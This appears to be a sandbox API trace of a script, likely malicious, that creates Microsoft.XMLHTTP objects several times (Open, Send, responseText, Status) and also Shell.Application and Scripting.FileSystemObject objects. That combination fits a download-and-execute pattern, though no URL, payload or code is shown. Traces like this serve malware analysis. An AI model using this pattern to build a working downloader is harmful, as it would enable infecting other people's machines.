	[0393.305] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0393.305] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0393.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0393.305] ??2@YAPEAX_K@Z () returned 0x62f310
	[0393.305] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f310) 
	[0393.305] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0393.305] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0393.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0393.306] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0393.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0393.306] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0393.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0393.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0393.306] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0393.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0393.877] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0393.877] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0393.877] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0393.877] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0393.877] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0393.878] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0393.878] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0393.878] SysStringLen (param_1=0x0) returned 0x0
	[0393.878] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0393.878] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0393.878] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0393.878] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0393.878] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0393.878] ??2@YAPEAX_K@Z () returned 0x62f350
	[0393.878] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0393.878] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0393.878] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0393.878] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0393.878] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0393.878] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0393.878] SysStringLen (param_1=0x0) returned 0x0
	[0393.878] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0393.881] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0393.881] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0393.881] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0393.881] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0393.881] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0393.881] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0394.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0394.279] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0394.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0394.280] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0394.280] SysStringLen (param_1=0x0) returned 0x0
	[0394.280] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0394.280] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0394.281] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0394.281] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0394.281] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0394.281] ??2@YAPEAX_K@Z () returned 0x62f310
	[0394.281] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0394.281] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0394.281] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0394.281] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0394.281] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0394.281] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0394.281] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0394.283] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0394.283] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0394.283] SysStringLen (param_1=0x0) returned 0x0
	[0394.283] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0394.283] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0394.283] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7230) returned 0x0
	[0394.283] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0394.283] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0394.283] ??2@YAPEAX_K@Z () returned 0x62f330
	[0394.283] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f330) 
	[0394.283] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0394.283] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0394.283] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7230) returned 0x0
	[0394.284] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7230) returned 0x3
	[0394.284] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0394.284] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7230, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0394.284] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0394.284] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0394.284] SysStringLen (param_1=0x0) returned 0x0
	[0394.284] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0394.284] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0394.284] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0394.284] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0394.284] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0394.284] ??2@YAPEAX_K@Z () returned 0x62f310
	[0394.284] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0394.284] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0394.284] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0394.284] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0394.284] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0394.284] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0394.285] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0394.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0394.285] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0394.285] SysStringLen (param_1=0x0) returned 0x0
	[0394.285] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0394.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
